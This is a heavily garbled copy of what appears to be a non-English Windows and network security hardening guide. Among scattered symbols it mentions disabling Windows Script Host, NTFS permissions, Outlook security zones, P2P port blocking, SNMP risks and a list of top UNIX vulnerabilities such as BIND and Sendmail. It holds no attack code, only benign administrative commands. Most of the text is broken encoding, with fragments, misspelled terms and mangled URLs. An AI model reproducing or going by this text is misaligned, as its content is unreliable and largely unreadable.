http://support .microsoft. come/support/kb/articles/q184/3/72.asp
http://www.microsoft.com/technet/security/bulletin/ms99-004.asp
http://www.microsoft.com/technet/security/bulletin/ms99-025.asp
http://www.microsoft.com/security_bulletins/ms03-033.asp
http://www.microsoft.com/technet/treeview/default.asp?url=/technet
/security/bulletin/MS03-033.asp
http://support.microsoft.com/default,aspx?scid= kb;en-us;82378
?
ver
*
$l '
2 3@ 0
=GX
3
$†$p MDAC
Z
I MDAC *
!89
6
F MDAC
bP
!
)
h @ n 9" ?
http://msdn.microsoft.com/library/default.asp?url=download/list/dat
aaccess.asp
" ?
0 5
:
2
0 5
'
) -,6 windows update - Y &
! " % &# 5,
Scripting Host(WSH Windows)
WSH
)
4 #
)
#B
5! j &' I 5
6*
„ 1 # 0_
-
- 5
6, " - Y
N
4 -,
,
6
#
U
l ' 6%
$"), )
4] , 5
-,<desktop
0_
5/
) K f4 *
F $% '
I ],
„1# $
K "), ) % !VSH ?# $
?@ " g@],
F
-,< K
? G
)
K "), ) 7 B
5! ?
n 9" C
5
,
- 56{† "), )
b
"), )VBScript P 21
) )
) F " $l ' „ 1 # 0,< ?
- 5 IE
') #
Z F
4
6' 4 #
)
-
? 5 ,B )
n 9"
)
4 #
% '
0_ # ) #1
ZF
-,< < VBScrip 0,
b
"
3O * M 6
7
%
3
% '\
vbs,. Vbe,js, .jse0) 0wsf
6 '$
B ;!
I 5 $, ,
& WSH O G
0
) X ! B % !$ ILOVEYOU , ]
J)WSH(
)
)
-
‰ : " U4
6
K6(
F ?# $S
T)J)
#
<R ? 1
_
) l '(
2 , 0, - 5 - Y
? G $jscript
6" E
i:
$() *
WSH K
)
#
- 56
)
#B
5! j &' I
) F " $l ' „ 1 # 0, <
P IE *
„ 1 # 0_
WSH
-
4 -,
)
Z F
U)
n 9"
-,< K
? !
?@ " g@ ] ,
E $% '
b
„1# $
6VBScript 2 1
) )
"), )
,
- 56{† "), )
N
I ],
0_ # ) #1
- 56
') #
5/
) K f4 *
K "), ) % !
$"), )
)
#
6
4
?# $
-
6, " - Y
ZF
J)WSh (
) X ! B % ! $ILOVEYOU ]
-,< < , VBScript 7
b
M ,6
%
I
0, ,
3 c
‰ : ?@ " U 4
3 O * WSH % '\
& "
wsf.vbs,.vbe,js,jse
OG
0
6 '$
)
$() *
"), )NT "), )
2 3@
6
<R ? 1
K6(
F ? # $S
)
i:
-
TJ)
) l '(
_
0,
2 , 0, - 5 - Y
#
? !
Jscript
6" E
+,
WSH n 9 "
*
B ;!
)
7
$IE )
,
$_, G
f4 *
]
SL {Š ) ME,98,98SE,2000,XP ) WSH,2003
0
'
0
Windows Scrpt
SL e 'j 4 7
h @ " ? Windows Download Script0 5 - Y
+
! ". /0(123&
-,< SL IE5.5 *
- 56 NT
) {Š "), ) ? @ )
K6
•
0
-,< SL pqqs ) XP $ME ${† "), ) ? @ )
0
WSH
#
W L3
0
$, <P -, < T
("c
("c :
K6
WSH A) " - Y
DY/
I
:
2
?@
K6
' ) SL
0 < ,6 3
)(E
#6
•
)
HS @e G
-,< SL ? @ )
" $,< ,6 3 - < ? @
,G j*
K6
- Y $?@ %
! " %&
$
456 123&
, 7 B
5! ) 6
" - Y , " WSH
0,< , 6 3 F
T#<
3
$l '%
l' 6
? 2 & * BWSH
- <
# 2
4 MR/ ) ? 5 TG' g 7
("c ,
)-
„ 1 # WSH ? 59
T G' g
?
) MR / $ 6
bP
%K
)-
) "
,G
) 785/ %
WSH 5 "
)
?@
"), ) % !
?@
DY/
#B
5!
"
I
#
3
3
* $
N ?), )
$
]
40 5
TG' g l '%
4$
0_,<
Noscript.exe b
8
$ WSH
6h8 % '( Wscript.exe
) Cscript.exe
6, BShell\Open2\ Command
E
6
6 ^
-,< K $ Sysmantec U )
#
5
SL
F W L3
I
("c
) Shell/Open/Command $
N 4 $S
0, < , 6 3 ( E $? @
Noscript.exea K5
TP
Y
2 , 0, 5
)
P
Q M , 6 " I'
" Noscript.exe
$ Norton Script Disabler/Enabler
) TG'] WSH
GX) 2 3@
Z F " U 4•
F
#B
5! W
6A"
L3
("c
4Desktop
K6% ']
#
wsf0.vbs,vbe,js,jse, $
OG
6% '] -
?# ?
6
-, < ( E
#
$-, < <
N 4)
-
j 5
6 '?@ ? 5 TG' g
,
DY/
$ 5 %K
I
6% ' "), ) e 'j 4
,
#4)75I
j 5
6
2
6% '
u
.
3
, )
" ? 59 " U 4 ,
'?
- .0
EXE
u_
) COM ) _
0, < , 6 3 Z F ? @ B '8
("c ? 59
0 5 6 '$" E
F%
#
F
"), ) e 'j 4
FWSH ?,< TG'(,! W L3
#
WSH ( E
) 7 , , ? 5 m .1
6% ' ^ P
"), ) K F
) / % '?, < T G'" U 4
,6 3 -
_ <
_(WSH
^
OG
•
'
] Noscript
0
)
T G' g
" %/
Symantec
) T G'? # $_TG' g
u
I
?
g
MR/
6
#
% '$
#
$S
2, 0,<
K6
#
0
-, < T
"E
?
0 5 d*
0, 5 •*
T /2 !
) ), . $,
# WSH ?
6
6
! $2
?@
F W L3
("c 5L
S @), ,
G
I 2, 0 < , 6 3
@? !
Z F ?# ? `56$
) / % '( csript.exe
#
0 wscript.exe
)= G
Cscript.exe myscript.vbs
? 5 TG' g
) MR/ - .
:
7 !89 S
WSH
I
h @" ?
http//www.symantec.com/avcenter/venc/data/win.script.hosting.html
0 5 - Y
,`
:&"
-, < ( N U ) )
? 5 TG' g
^P
I
3
$l ' 6 &'(
O *
6% ' I ] 0
6
#
( E
WSH0, 5
b
-, < K
6(
$S
6%
) / K5 X
, <
.scr.vbs,js,jse, wsf,bat,
Script Blocking
4gatways U )
SL $? & ) ? , 6 WSH ?
-)8! ]
("c
@
$
2, _
4" - Y
# ) #1 6
) 6h )
)exe pif
and
8Q _Norton AntiVirus 2001 ? # $, G
C
P
6h) ) %
? & ,
K
DY/
a; [
,Z 2(2 +
WSH " ?
QS $
?@ *
2 3@ 0
h @Windows Script Download0 5
'Z
7 G', $ 3 ? 1
'
+ , 2R NTFS
6" E " NTFS h
wscript.exe ) jscript.exe
% H
?
i: = G
"
K6-)
)?
I
?
^P
9
- 56account
V <
% ' )
#
% ' )
" 0 5 - Y $"), ) PG
e 'j 4 7 5 I $ <
6% ') 6
Full Control -)
$‰8
W L3
l 'e
) Everyone
$, <
?
?
5 $S
2, 0 <
("c " E
'j 4 7 5 I 0, <
$ 6
0, ,
+
:
uNTFS
6" E
TP
5 % <
'
I
25 0, <
5 S
K6-)
)?
) X
" %/
$
) 6% 'MR / ) T
wscript.exe ) cscript.exe MR/ % < 6 ,1') 6% ' "
I
<R V <
<R NTFS
e 'j 4 7 5 I $ <
7
6
% ' )
^P
a K5
25 , LH
B' )
O * $My Computer ? 5 TG'•
$
0,<
_% '$
$
u , LH
] -,< O *
0 K5
d*
9
-)
$?, 3] " E
L3 Y.
O*
tab 7
(,! Deny )
?# Allow
% '
Property $
?&
% ,P
% '
I
)
$
NTFS
convert drive_letter:/fs:ntfs
6" E NTFSah @ " ?
bP
\ $Pemission j*
0, 5
#
Security j *
F) ?@
)
^P
.Y
F) ?@ "
Property Y. ? 5 TG'•
< ^
Account $d
I
<
5 -,6
" ?
I - . W L3
% ' )
d*
6" E
•
& 0 K5
_000 ) 2 <
Security
$% ' ^
NTFS 0
•
-,
, #4
$ Convert ] 0 5 - Y
7 !89 S
I5
$
http//www.microsoft.com/windows2000/en/server/iis/htm/core/iidfp
sc.htm
0 5 - Y
! " % &# 0,
Outlook Express, Outlook Microsoft
Outlook 7 !89
$l '
0
') #
$ 6h 5
b
$_U '@
-,< K
, ?# $ # ) #1
^P 7
0, 5
Exchange ) K
4"
K $
K6
0, <
"2
-, < K
0_
-
? &56
‰:
Outlook98 y
SL 7
P
# ) #1
0
I
5
6
BH
)
-
$ F
!" V
8Q 0, < , 6 3
C
A
0 ' ,6 3
3W 3
6%
4
H I W L3
) ?N
IE
^
- Y
F
6*
%/ -
"
6
J) 0
-
,E - Y
9
) U '@$
, ) T) ,
)
1
) < ,6 3 TP
N P ?@
6
- Y
*
?), ]
$:
, "
T#< ")
=GX
[
7
F) 7
G ) - ), .
?@ " - Y Z
")
B
5! b.
, N : <2
C
G:H
6j1 $2t5: ) 25
S
*
" - Y 0, < , 6 3 6 '&
F =GX $W 3 L !
I
$
6 &'(
SL ?# _ c
$l ' # )
3
$
) rendenring 0, 5
6 )
H ? 5F
*
?@ - 56
, 1
6 '$( '784 2
, G 7c L.
!
]
56${Š "), ) 'G ? " " ]
' ) #
Outlook 98
IE - Y a? `56 P
Q
4 -, 6 U )
=! > ?@
SL
? !
4 " HTML
2
-)8!
Server
V < ? " $7 H8
IE
-
Yc j*
5 ? !
) L*<
1
) 7 ,3 K
Backoffice „ 1 # " - Y ? # $"), ) % !
$
U)
*]
6
c L. n YBIE ) OE
I
4 -,
5/ 0
)
Express Outlook ] _OE
Outlook K
! 5E "
? " ) 6 1G'Oulook
"
4 l),
F
# ) #1
bP
b
2,
5 $
6 &'(
4
6 '&
$_ ' ) #
("c 78
%
,
- 4$ ') #
BH
M ,6 "
# 0 < ,6 3 T
# ) #1 6
) 7 !89
,
,
\X
2 )-
$ # ) #1 6
0,<
< TP
O *
&'(
P
6h) )
6@
& ? 5 About
I
n 9 " Help
l'
f4 "
Outlook ? !
Z
0
,
:3 ) 7 , , ")
# ) #1 6
-,
"
*
2K4
0 ' 6 @
6*
6N F e 'j 4 SL ] 0
,G
- 5< " ?
?) ' 6 BH
3"
$IE )
F " U4 $IE TG' $
>! ? !
) ,< ,6 * SL
Outlooka
U)
l ' &'(
6
K U '@-
$?@ SL W L 3
_
-,< K
"), )OE
0
B '8
0, < -
6T
/ "
5 - 56 -,< K
"
, ,F *
-,< E
+,
6*
*
G
6, ) 6(
$() *
OE
e
)
!89
6)
$
,
$
,F
)
7
5L
6*
Outlook9 •
Outlook97 •
_ <
Y & Outlook2002
_ <
& ? 5 TG' About
*
pqqq "
a 5 - Y
"
] Outlook 2000 •
) Outlook10 ?@
] OutlookXP •
n 9 " Help
- 5< " ? OE 2K4
!
Y & Outlook9 ?@
6*
Patch +
0 ' 6@$
" ?
!89
-http//www.microsoft.com/windows/oe/.
-http//www.microsoft.com/office/ outlook./
+
! ". /0(123&
F " U4 ] IE
:
)
2
_
-,< SL
0,
(N )
) SL "), ) % !
6
?@ - 56
Outlook Express
" * IE
$U '@ 6
SL
*
"
,6 3
,<
! 5E SL
" - Y
( ,H ? Outlook -, < K
( N (,! 7
0, <
H, , e G
?@ )
K6
0
-,< SL &
0 < ,6 3
HS @e G
0 5 OE )Outlook
6*
3W 3
$ 9
5
%K
75 I
& A
! (,!
#
) -,< SL
0 <
! " %&
456 123&
"2
a
(E
F 7 , , j6 ) l ' R4 S @ %
YB* 7 B
5!
# Outlook
+
6
"
Outlokk Express
e 'j 4 7 5 I ) SL Outlook ) Outlook Express
7 5 I W L3
4
DY/ I 5
("c
W L3 2
0,
:
2
0
=GX
2t
5: -,< SL
*
?
(N " ) (E
a
SL ) http//windowsupdate.microsoft.com/
. ] Critecal C L 3 -,< K
_
n 9 " Layout
0
6
,
& O*
0_Preview]
6 'Show Preview Pene
bP
" 5
Security Zone]
) O * Options
& ? 5 TG' g
n 9"
a,<
:
I
" View
5#.
2
•
0 # ) #1
High I
<b 2 "
$7 !89 "
6
5
1
) % 4 ? 5 T G' g •
0 < '
?
6Patch
/ 7 5I ? 5
& Tools
- Y •
) A" @
) X?
25 , @ ' ^ P
,
# ) #1 6
"
•0
% !
" - Y
K ?@
j
:
("c
?
F
$, < 2t5: ?@ -,
T
+P
6h) ) W L3
/ $ 5 5X % '
("c
'
•
? "
$?@ ? 5 TG'" %P
H) ,
0 <( E
"
g ] , 1'
? !
? ,
6h) ) "
6% '
"
("c $ 5 5 X % '
" ,G b
'
5 5X
'
$l 'h @ ] 0 5 - 3•_MY Documents
6% 'S
#Y ]
5 O*
N
_
("c 0 <
3
# ) #1
XSL
% <,
0,6
' ) #
" - Y
macro Disable
I
6% ' /
'
F
# 2
,<
% '
*
6,
•
("c #
High ,
&
)
- <
HS @),, e G
7c L.
:
6% '? 5 T G'" •
- 56 5 5 X
) DOC
•
? "
$_Word
I]
TG'
0 < '
`
:&"
6
!89
DY/ W L3
6
0, 5
DY/ " ? 59
"
K $O *
(N
(N 7 B
5! $h) )
@ ' 4
h) )
@ ' 4 ) , ,F
6% '? 5 V8 " ? 59
4 0, <
)
6
-,6
# ) #1 6
? ,
?"
h)
h @" ?
6
U)
$O * Π#
)
@
6
NY67
6
)
(E
5 j 4)
@
) 6h) ) "
) 5 5X
@
7 L
6
" - Y " %P
H h) )
,
Q%
Q $7 , , 2 , ,F %
0, 6
)-
6 &'(
L %H , / 6h) )
, , " %P
H $Π#
n 9 " 6(
@
) 6h) ) $ 6(
6
I5 -
? @b
7 # $h) )
6,
I 5 0,
BH
$
P
DY/ 6 & $
" ,G 0,
6% '7 L
+F
)O * , % <
(N
# ) #1Preview $
I 5 0,
$ '
http://www.microsoft.com/security/protect/antivirus.asp0 5 - Y
A
) #
QS $Outlook
+
Express OutlookG
Outlook Express j &'M,6 ]
$l '
*
"
2 3@ '
I 5 0_ c
g] , 1'
?@ ,
? G 6h) ) "
"
/ )
N
6% '
'
7 G',
'
3
2
_
O*
6% 'S
#Y]
F
\) < :
5 O*
N
) DOC
0,6
' ) #
macro Disable
)
6% ' /
0
- <
" - Y
'
,<
% '
*
6,
•
("c #
High ,
&
F
# 2
HS @),, e G
7c L.
<
- 56 5 5 X % '? 5 T G'" •
# ) #1
XSL
% <,
•
? "
0_
("c 0 <
9
l 'h @] 0 5 - 3•My Documents
,G b
5 5X
3 ?1
5 ) 6 BH
("c 5 X % '
, 1'?
"
'Z
_Word
I]
T G'
0 < '
`
6
DY/ W L3
!89
6
, 5
(N
(N 7 B
5! h) )
@ ' 4
h) )
@ ' 4 ) , ,F
6% '? 5 V8 " ? 59
4 0, <
$
)
-,6
6,
I 5 0,
BH
6
# h) )
K $O *
DY/ " ? 59
"
P
? @b
U)
? "
$O *
@
6
6
# ) #1 6
? ,
h) )
I
#
+F
,
:&"
6 &'(
) 6h) ) $ 6(
NY67
6
6
)
(E
6
) 6h) ) "
I
7 L
5 j 4)
, , " %PH $
) 55X
@
Q 7 , , 2 , ,F %
0, 6
)-
Q%
L %H , / 6h) )
" - Y " %P
H h) )
n 9 " 6(
@
I
#
@
)O * , % <
DY/ 6 & 0
" ,G 0,
6% '7
0,
A
L
(N
# ) #1
$Preview
.
http://www.microsoft.com/security h @ " ?
$ ' ) #
0 5 - Y /protect/antivirvirus.asp
Outlook Express
M, 6 ]
'Z
" ?
7 G',
$l '
" ? 59
*
'
I 5 0_ c
U '@ 6
)d *
7 L l'
.
7 K
&F "
6 @
I
XP Security h @ " ?
#
7
u
) Outlook ?
4
(N
5
("c 0 5 - Y white paper Office
# 2
$,<
#P<
? , 0 < -,
" Outlook
) X ) ("c "
bP 7 5 I )
6T5! " %P
H
I5 ,
( N6
0 5 - Y Offece Product
0, 5
$XP U '@ *
- <
)
5 ) 6 BH j &'
http://www.microsoft.com/windows/oe h @
I5 0 5 - Y
Updates page h @ " ?
^
QS $
9 Outlook Express
3 ?1
2 3@
Outlook +
"
* 5<
, \89
# ) #1 6
"
( N6
^
\X
$
7 K
&F
<@
0, 5 - Y Resource Kit Office
Outlook Express
U)
6
)
# ) #1 6
? 5 Uninstall
I
N W 3
( ,H ?
$
?
"), )
6*
)
0 5
?
ME
Setup
- Y 7 !89
, -,
•
Outlook SL 7
? 5 Add/Remove Program
•
Outlook ExpressSL 7
) {† "), ) )
O * ) Windows
" #
) " Outlook Express ) Outlook
a 5
& " - Y
Outlook ? 2 &Uninstall
& ) Add/Remove
Progtam ? # @ O *
0 5 6 ' ?@ MR/ ?# Outlook Express
?
XP
a 5 - Y
•
Outlook Express SL 7
) pqqq "), ) )
"
6h @ " 9
7 B
5!
, `4
F
Outlook Express Version 5. X/6.0 *
h @" ,
- Y
,
"
pqqq "), ) ?
5
…
- Y
http://support.microsoft.com/default.aspx?scid=kbEN-Usq263837
0, 5
Outlook Express Version 5.x/6.0 *
h @" ,
- Y
$,
"
ME
5
) {† "), ) ?
…
- Y
http://support.microsoft.com/default.aspx?scid=kbEN-Usq256219
0, 5
R4 S @ : 2 5
Wimdows Peer to Peer File Sharing (P2P)
6 ' ?# 2 ) 0, < '
User mode
I
" ,
H- Y
' $ K, )
" ]-
2
l' 6
h
-,
"
- 3• >'
I
4 -,
? G? ,
6-
I
N
6 #P<
" % ' '
? ,
)
SB
g
-,< K 7 < &
?
" ) +"
0, 5
)
6'
)d*
<
3
)V#
$ 6% 'V <
2,
U)
? N - Y
Q
" - Y
H? ,
I5 l ' 6
code Source
Napster b
6
9P T
" \ 2
- Y _
/) 6
, 5
6
2 H
U)
6
+" ) Download
)Y \
5
<2
I
3 ?1
7 L SB
g l'
6 "
I
!
B
B
512
U)
?#
1
&5
) ,<
d
l ' R4 S @ :
6
n 9 " -, < 1P
0, 5
(
7) Y -,< - <
^ P ) -,
0
E
F
6-
E F
U)
I
&'
6% '
,
)-
?
0, R V <
6% 'T
)?@
download 2 ,
7
5
„ 1# 2
LAN
,63
L ?
6
F
1
), 5
)
5 0 5
' $ 6% 'T
F) & WAN
6
H ,F , , ) S @ e G
(E
U)
'/ < \
N 7 4" - Y
K
-
1%
I
l'
\P
< ?# W 3
6
P2P
) (E
6% < ,
67 4 " X /
I5
?@
http wrappers " - Y
" - Y
) E F ^P
0,<
( ,H ? " ?56
- Y e 'j 4
I
), . ("c 78
I ^P , @ '
<] -,
I
0 ' , 6 3 -,
6 #P<
0 < ,6 3
% < I
_-,
Q 0, <
)
6
'
E F 0, 5 upload 2 ,
l ' 6
-, < T 5!
3
? &56 : ,
. 2'
T/
v 4 6
6
? "
i:
multithread
/ ) j &'
" - Y ? "
5
"E
g
DOS \ "
85/ ;! ,
) _P2P -,
U)
7 !89 23 , - 9 *
F) 0 <
<R V <
,F :
<
_ …)
F) & ^
6 &'(
$
\X
]
L $
2
,
#4
:
_
% < P2P
$ " ]&
B'\
l '7 , , 0 '
=GX % 1
, ] #P<
),.
H %K
N` 6]
:
2
0
] 7c L. -, 6 K
6
n 9 " -,< K
6
\ 2 " ? ,
.
6
_
,
<b
.
TP
- Y )_
) B'
0, 5 F
$() *
% !
_0
F
6*
5
-, < < "), ) )
F) & U
1) U#
^P
SL
% !
P2P
?
I5
6
+,
,G
^
0, <
3 W 3 j1 #P
< )
5 - Y "), )
6*
:
,, 2 e G
P2P
a
" \ 2 b
-, < - Y T) ,
2
P
1
& ?@) <
! ". 0(123&
6
" - Y d *
4
4 )
"
6* ]
+
,6 3 TP,
6
"
:
#P<
' y
2
<
•
6
6
b
C 5!
application layer strings
'
E F•
- Y P2P
0
-, < download
. T
I
#P< "
- 3• 6? #
_exe, mp3, wma, avi, mpg, mpeg, jpg, gif, zip
0
"@
'D
j6
#P
< "
- 3•Z>'y
! " %&
(E
)Y 7 B
5!
6% ']
$l ' R 4 S @ : %
•
b
•
456 123&
DY/ I 5
a
? "
? H ) dowmloading
6
^P
|
<
" - Y •
T G
? "
? "
g
6
" - Y - .
.
#P<
6- N
^P
" - Y •
T G
) #P< "
•
- 3• >' 5
0" E
;N8
6 &'(
C L3 &'(
SL
H
5
3
•
15G ?
0, < P2P
T
P2P
6
b
I
) 4 -, 6 U )
" - Y •
-,< - Y
67 4 _ ) ) | F) 3] y
P2P
^P
'
0-,< ( N h) )
-P2P + ,
B'•
•
C L3 #P
<y
@
6 &'(
"
& \ 2(18 1 5
") - Y •
+ ,C 2
_••{{ $††}Š $†††† - 5< TCP
67 4] Napsster
•
_‹••Š $‹••p $‹••w - 5< TCP
67 4] edonkey
•
•s‹} $•s‹• $•s‹Š - 5< TCP/ UDP
67 4] Gnutella
•
6- 5 < TCP 7 4]Kazza
•
TCP/ UDP 7
4 ) www
wp‹w - 5<
! " % &# ,
Simple Network Management Protocl
(SNMP)
-N
5
SNMP " - Y
784 2
) ,
, #4) ) - " y
#4
I 5 ?@ "
#
SB
g
$T
0 <
1
)$
I 5 SNMP %# ) 4 "
- Y TCP/IP
- Y
P ' 4
#P
< 7) Y
6
6( '
-
) 6Access point $ 6ˆ K $ 6 ) $ N4
'
0 <
SNMP
,
6( 4
^
6N
3
2 ( 4TP
B %
,
6- N
$SNMP
-, < - Y
b
o
F
&
$
SNMP
N& S
^P
%
< 0_, 5
- Y
] #P<
)
3
$l '7 !89 " - Y
Q 0, <
R4 S @ ^
?
5 SNMP
u
- 5< *
$SNMP
0_, *
L3 7
L
_U )
3
,K
B!
" ,G b
R4 S @ ^
< $h
_?@
/
X !
6-
' )
!89
-,< %L
3 M,6nH ) S
-,< K
6v
6( 4 , K
"
$SNMP
*
I5
j ,4
]
< TP,
P
"
- Y
6N
6N
O*
H
e 'j 4 7 L ? ,
6T, " - Y
- 5< *
#4
PG ) , K
R4 S @ ^
3
, G ) T G' SNMP
,G
" $SNMP ) )
,1 "
I5
7 K
&F
SNMP
6( 4 "
<
0, <
R4 S @
^
, ) ,
) 7 !89 Z ',
2 5F
)
H $l ' R 4 S @ ^
- Y SNMP
3 785/ &
c L. $ N
#4?
bP
R4 S @ ^
6*
5 i: j &' I 5 ? ,
6N
SNMP
6A) " - Y (,! 0, 5
! N " $
#P
<
A) " [
P e 'j 4 A N 0,<
6
0, <
3
gV
"
PG ) , K (& # ) -,< 1P
^ P
SNMP 5 , H
? G -, < &
<
) 6
3
7 & E ) 7c@ 2<
]
V
^
- Y
6A)
6( 4
6A) " [
0_78#
,
6A) 0, 5
-, < - Y
,
6A) " $SNMP
)Y
" ] DOS \ " 7) Y 785/ ( E
? '
0, <
I5
$qs …pqqp CERT – h @
R4 S @ ^ 0 5 -,6
0
6N
! B
5F " $ 6( 4 "
* ] SNMP
- 5 _
- Y $ #P< y
I 5 -,< - Y
:
I K 6N
H
, 5
6T, " - Y
6A) W L3
,1
K
]0, <
("c ,
U)
? G SB
g )0
2#5
#P<
, 7c .
A)
SNMP0, <
Point
6- N
U
1) U#
-, < d *
0
3
$UPS
6N
^
)
$ 6 N4
,
7) Y
/f
=GX % 1
,
:
9P
Bridges ) access
% !
P 785/ &1@ " %
#4
B5#
I 5 -, < - Y
SB
g SNMP " 0
#P< 7 & E $ )
SNMP ,
, b
) Windows Service (&B
SL
6*
$SNMP
6
SL $ #P
< )
6
7) Y
embedded
e 'j 4 7 L $SNMP
5 TG'"), )
F
2
6*
0 <
- Y
785/ Q
0
$() *
* SL
Q 0, <
-
&
- 5 "), ) % !
+,
6*
5 T G') SL e 'j 4 7 L l 'U )
SNMP
l ' R4 S @ :
P
5 CP
0, -,< K W L*
#P
<% !
6
0 < ,6 3
+
$ #P<
-, < % L
)
F
5 $SNScan N 4
6N
)
0 5 - Y
. Foundstone. http://www h @ n 9 "
" - Y
? #
#
0
SNMPZ F ) SL W L3
GF
?
^
% !
T G'd *
-,6
)
" - Y
SL )
"b
5
I5
A)
" ?
) #5
?
?
<"
67
# n.7
a < ,6 3
-
"2
Com/knowledge/free_tools.html
'
$
2
netstat
w•p ) w•w
)
! ". /0(123&
SNMP SL
I 5 ("c 7 B
5! $SNMP "
b3
) 6- N
H,, e G
?@ ?
("c
7,
U#
,
0
KF
0
(E
( E
2
6&
7 L
- 4- ."
)- @\X
4 )
F) N 4
6 @ " U4
(E
6U )
SNMP
E F)
7 B
5! 2 netstat-an
H,, )S @e G
$SNMP
-, < - Y
) e 'j 4 SNMP Community
] 13
F)
_ P
!
h,/ % H SNMP Community
F)
Community SNMP Y*
F)
6 <
! " %&
DY/ 7 ,H ?
0 5
")
456 123&
$l ' R4 S @ : %
DY/ I 5
6, "
-1 < $( ?
! "+ ,
I 5 $SNMPv3
) 6( 4 , K
27
456
SNMP ? 5 TG' g
?@ " - Y 7 ) X (,! 7
P
T,
" - Y
_?# 7
Patch *
2 3@
?
$? ,
$)
)
, 1 7 L*
"
TCP/UDP
w•w 7
,
4] , K5
0
K6
),.
agnt b
^
b
agnt
6@
B' #P
<
(E
6
% !
SL $-,
) )
P $
)
6-
,1 b
3
,
? &
P
A R 4 W L3
T
("c T
P
!89
y
SNMP
3
3
6N
"
?
6*
B'T) ' " - Y 0
? 5 V8
w•p 7 4 )
2#5 l ' J) 0
$?@ " ,G ) pqqq"), )
6
9
F) F 3 7 L
l '7 B
5! ?
6
-,< K
SNMP
B
SNMP agnt b
6
6
N&
SNMP " - Y 7
*
l '7 B
5! 0_TCP/UDP
) X #
- Y SNMP agnt
] 6-
$CERT Advisory CA-2002-03 5 5X j*
0 5 GF
[
6& ? G
?
1
) $,<
Q
0
(E
( E IPSEC
& ?&
B'
)
0 < +H )
` 6
?@ " - Y 7 ) X (,! 7
+, 8
456
SNMP ? 5 TG' g
I 5 $SNMPv3
) 6( 4 , K
P
T,
" - Y
_?# 7
W 3
"
2
0
)
) 7
$)
)
*
SNMP " - Y 7
P!
L )-
h,/ % H
g
,
O*
0, < )" @
W L3
3" ?
N&
6& ? G -, < - Y ] community
- Y _
( #.
] 6-
("c
:
2
0
I5
N
u&
("c
"W 3
P
F 7 # " - Y
(E
P
!
6&
$http://www.sans.org/resources/idfaq/snmp.php h @
6 ),.
-,< '
-, <
K
0
b)
w•w 7
B' #P<
) )
6-
l '7 B
5! 0_TCP/UDP
#
#40
4], K5
(E
$-, < & 5
$
,
F) F 3 7
6subnet 2 SNMP " E
'
B
I
&
- Y
SNMP
9
w•p 7
4 ) TCP/UDP
L
6N
,
I5 C
'
) X
y # B' ,
0, 6 ( E
Q
I c2 '
R4 S @ ^
2
U
1) U#
!"
1
23
4 0, <P
7 !89 "
)
0
)
%K
25
:
-, < =! > ?@
56 $
5B
!C
8
? ,
)
5L M 9
A
'D
(E
! 5E 2'
/)
F
&1@
6 GH )
5 2'
H? "
?@
P 4)
"
R4 S @ ^
3W 3 P
B
9
F) % 1
,
' ?5F
) - 5 - Y -,< 3 <
$
3 M ,6
%
,
, N ?#
-
) 6? "
& 5
?5F
^ 2
"
S @^
N &1@ )
S
6@, 5
D Y/ c
) [
3_
O * 7
<
\
R4 S @ ^
) 6 Y/]
) X
F 78#
" V,
,G
6A)
2
,
,3
%K " 6
O * M,6? G
Cod Red )
% !
7 !89
? @ > GP
8 $
B I
6
?
Q
6U )
6 &
$ ?5F
0, 5
) 6(
I
RN6 2
#P
<
E )
6
" - Y Z
I
N
) !
Y 785/
T) , % !
=GX ^
N` 6?), ) - # M 9
(
&@
I
J
0
,G
6
-
6
O*
I
56$ % !
-")
P % !
: ),
F 7, ,
, - .
6; . " -
"
M 9" ) , < % !
@)
&' * +
# $% !
6
R4 S @
<
b
R4
0, <
) U#
R4 S @ ^
F) B
!$
)
2
R4 S @ ^
R4 S @ d *
N 560
"
,< ,6 3 K
6 'G " U4
2
<) , , e G
% !
$ R4 S @ ^
"
6%
c
3
6
! 5E
4 63U
$
1
=GX
N 4) B - .
% !
6
R4 S @ ^
-, " )
<@ ? @
^
&1@ )
!
? "
F) " [
< )@
785/ ) 7 , , SB
g $,
6 '?5F
#P
<)
F
? ,
"
)
4 ,
1)
$
- < ?@
R4 S @ ^
"
% !
6 S
0
3
=GX
I
bP
G )
i:
"
-
\
785/
F
-, 5! -)
-
-")
K6
F
-
F
, 5
- Y % !
U#
R4 S @ ^
R4 S @ ^
("c
6%5G1
% <
B5# ) , Y 7 !89
? F
2 5F
("c 7 ,H )
6
I ;&2
- Y
-
? F i:
0, 6 ( E
)
- <
b
f
! "M &# ( $
% !
"
, G 785/ ?
? G _7) Y
2
?
6
# $U#
0
6 * ] U#
$ -,< ( E -
)
a- 5
BIND Domain Name System
Remote Procedure Calls (RPC)
Apache Web Server
Generl UNIK Authentication Accounts with No passwork or weak
passworde
Clear Text Sevices
Sendmail
Simple Network Mangement Protocol (SNMP)
Secure Shell (SSH)
Miscon figuration of Enterprise Services NIS/NFS
Open Secure Sockets Layer (SSL)
BIND Domain Name System
)
-
$ (Berkeley Internet Name Domain) BIND &'(
h
- Y DNS_Domain Name ] "
BIND 0
/ 5
IP h @
_http://www.srco.ir/ a
#P
<
\ " C L3 $ 785/ ( E
( E ?@
I5 S
^P
1
) $, -
- 4 #
(E
? ,6U)
M,6
0, <
R4 S @ ^
) -,
,
!"
#4
DNS T# < ")
BIND
K6
j
CA- CERT
785/ N " , 5
dOS \
K
:
l 'F
6v 4 T
"
0
H ?@
-,
) - Y DNS
;!
BIND -, 6 U )
Dos \ " F
>/ 0, <
R4 S @
,G %
Z
#4)
W
ZF
$ Dos \ " F
B
5F " 0,<
" F
!
L3
) X
",
Cache
< TP,
^
-, < =
7 K
&F Advisory2002-15
H
Overflow \ "
3
:
Resolver +
^
")
<
"
- 4
F ) DNS
3
2
$ 3
7 K
&F
",
F) :
5F
2
6 ' l ' R 4 S @ : " - Y Z ?# $ - *1 ,
,, 0
5
" ,G " 6
N ")
2
0,6
<R "
R4 S @ ^
,
CA -2002 -19 CERT Advisory 1 0
" F
$
" $l '785/
K6
3 #
1 0
E
? & ) 9
785/
5 $ 6% 'S
:
? '
I5 ?
, $ 5 ,H
) Buffer Overflow
=GX
?@ ?5F
< TP, ,
L Bind deamon ? @ )
l '%
?@ "
- Y -,<
? G
? 5 M 9
? , ("c 6 @ (, ! a,
*
0
(, ! ) DNS U )
<8 BIND ? ,
)-
F
I5
785/ ) O * _Dos] Denila of Service
!
6U )
g7
% ,P I
/ - N F ) BIND " - Y
?@
0, -
I] ? &
- 4
,
R4 S @
O *
/)
N
?@ " ) - Y l ' GX) " ? 5F
- Y
@
,
6
6 @ ?), )
1G' I 5
2
3 PG
g
0
#P<
6-
'784 ? G -, 6 U )
F
" ?5F
0
R4 S @
- 5 U
2 , 0, 5
-
